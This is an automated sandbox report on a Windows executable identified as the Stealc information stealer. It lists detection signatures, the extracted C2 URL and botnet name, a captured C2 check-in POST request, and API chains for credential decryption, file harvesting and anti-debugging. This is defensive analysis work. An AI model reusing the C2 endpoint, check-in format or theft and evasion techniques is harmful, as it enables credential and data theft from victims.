Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1518345
MD5:b9685047e27fbb94ab3bd20943b85349
SHA1:a4f1dcf5c64c4ceb69383629fff1ef307b650d25
SHA256:26e70ce5246844690acc15b42d890012bf2d0df4fcdda2e3b5982d65b1731e65
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B9685047E27FBB94AB3BD20943B85349)
    • WerFault.exe (PID: 2020 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 1048 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://193.233.113.184/6d687e53250c2111.php", "Botnet": "LogsDiller1"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x21c8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2192078423.00000000024DA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2036702828.00000000040F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.3.file.exe.40f0000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.file.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.file.exe.40a0e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.file.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.file.exe.40a0e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-25T16:07:07.928509+020020442431Malware Command and Control Activity Detected192.168.2.549704193.233.113.18480TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: http://193.233.113.184/6d687e53250c2111.php/Avira URL Cloud: Label: malware
                    Source: http://193.233.113.184Avira URL Cloud: Label: malware
                    Source: http://193.233.113.184/Avira URL Cloud: Label: malware
                    Source: http://193.233.113.184/6d687e53250c2111.php)b:Avira URL Cloud: Label: malware
                    Source: http://193.233.113.184/6d687e53250c2111.phpAvira URL Cloud: Label: malware
                    Source: http://193.233.113.184/6d687e53250c2111.php5bAvira URL Cloud: Label: malware
                    Source: http://193.233.113.184/NAvira URL Cloud: Label: malware
                    Source: http://193.233.113.184/mAvira URL Cloud: Label: malware
                    Source: 00000000.00000003.2036702828.00000000040F0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://193.233.113.184/6d687e53250c2111.php", "Botnet": "LogsDiller1"}
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: file.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_040A74A7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_040B9107
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_040A9D27
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_040A9DC7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040ACA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_040ACA87

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.1.unpack
                    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040AE077
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_040AC0D7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_040ADCE7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AF8F1 FindFirstFileA,0_2_040AF8F1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_040B4107
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040AF917
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040A1937
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_040AE697
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_040B3B17
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040B4B77
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_040AEF87
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_040B47D7

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 193.233.113.184:80
                    Source: Malware configuration extractorURLs: http://193.233.113.184/6d687e53250c2111.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.233.113.184Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /6d687e53250c2111.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 193.233.113.184Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 42 39 34 46 37 46 44 32 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="hwid"FCB94F7FD224796922796------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build"LogsDiller1------GCBGIIECGHCAKECAFBFH--
                    Source: Joe Sandbox ViewASN Name: FREE-MPEIRU FREE-MPEIRU
                    Source: unknownDNS traffic detected: query: 206.23.85.13.in-addr.arpa replaycode: Name error (3)
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HeapCreate,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.233.113.184Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /6d687e53250c2111.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 193.233.113.184Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 42 39 34 46 37 46 44 32 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="hwid"FCB94F7FD224796922796------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build"LogsDiller1------GCBGIIECGHCAKECAFBFH--
                    Source: file.exe, 00000000.00000002.2192078423.00000000024DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2191994002.000000000249E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184
                    Source: file.exe, 00000000.00000002.2192078423.00000000024DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/
                    Source: file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php
                    Source: file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php)b:
                    Source: file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php/
                    Source: file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php5b
                    Source: file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/N
                    Source: file.exe, 00000000.00000002.2192078423.000000000250C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/m
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 1048
                    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2192054558.00000000024AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@1/1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\XGMDS7QL.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6584
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ea3d22d1-892b-4b05-baf7-85dbf80366b1Jump to behavior
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 1048
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024B47D4 push eax; ret 0_2_024B47F2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024B47E3 push eax; ret 0_2_024B47F2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024B1804 push 7DD07DC0h; iretd 0_2_024B1815
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040BB29C push ecx; ret 0_2_040BB2AF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
